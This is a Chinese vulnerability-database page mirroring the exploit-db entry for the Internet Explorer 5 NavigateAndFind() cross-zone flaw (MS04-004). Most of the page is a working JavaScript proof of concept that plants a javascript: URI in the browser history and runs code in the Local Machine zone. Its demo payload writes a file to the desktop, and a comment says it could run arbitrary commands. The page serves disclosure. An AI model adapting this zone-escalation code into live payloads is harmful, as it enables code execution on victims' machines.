Microsoft Internet Explorer 5 – NavigateAndFind() Cross-Zone Policy (MS04-004)

Microsoft Internet Explorer 5 – NavigateAndFind() Cross-Zone Policy (MS04-004)

漏洞ID 1054385 漏洞类型
发布时间 2004-02-03 更新时间 2004-02-03
图片[1]-Microsoft Internet Explorer 5 – NavigateAndFind() Cross-Zone Policy (MS04-004)-安全小百科CVE编号 N/A
图片[2]-Microsoft Internet Explorer 5 – NavigateAndFind() Cross-Zone Policy (MS04-004)-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23643
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9568/info

A vulnerability has been reported in Microsoft Internet Explorer. Because of this, an attacker may be able to violate cross-zone policy.

It has been reported that the issue presents itself due to a failure by Internet Explorer to remove JavaScript URIs from the browser history list in some circumstances. A JavaScript specific JavaScript URI, can be embedded in the Browser history list and further employed by an attacker to have JavaScript code executed in the context of the Local Machine security zone.

// Andreas Sandblad, 2004-02-03, patched by MS04-004

// Name: payload
// Purpose: Run payload code called from Local Machine zone.
// The code may be arbitrary such as executing shell commands.
// This demo simply creates a harmless textfile on the desktop.
function payload() {
file = "sandblad.txt";
o = new ActiveXObject("ADODB.Stream");
o.Open();
o.Type=2;
o.Charset="ascii";
o.WriteText("You are vulnerable!");
o.SaveToFile(file, 2);
o.Close();
alert("File "+file+" created on desktop!");
}

// Name: trigger
// Purpose: Inject javascript url in history list and run payload
// function when the user hits the backbutton.
function trigger(len) {
if (history.length != len)
payload();
else
return "<title>-</title><body
onload=external.NavigateAndFind('res:','','')>";
}

// Name: backbutton
// Purpose: Run backbutton exploit.
function backbutton() {
location = 'javascript:'+trigger+payload+'trigger('+history.length+')';
}

// Launch backbutton exploit on load
if (confirm("Press OK to run backbutton exploit!"))
backbutton();

相关推荐: Cisco PIX ICMP Echo Request Network Address Translation Pool Exhaustion Vulnerability

Cisco PIX ICMP Echo Request Network Address Translation Pool Exhaustion Vulnerability 漏洞ID 1099421 漏洞类型 Design Error 发布时间 2003-10-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享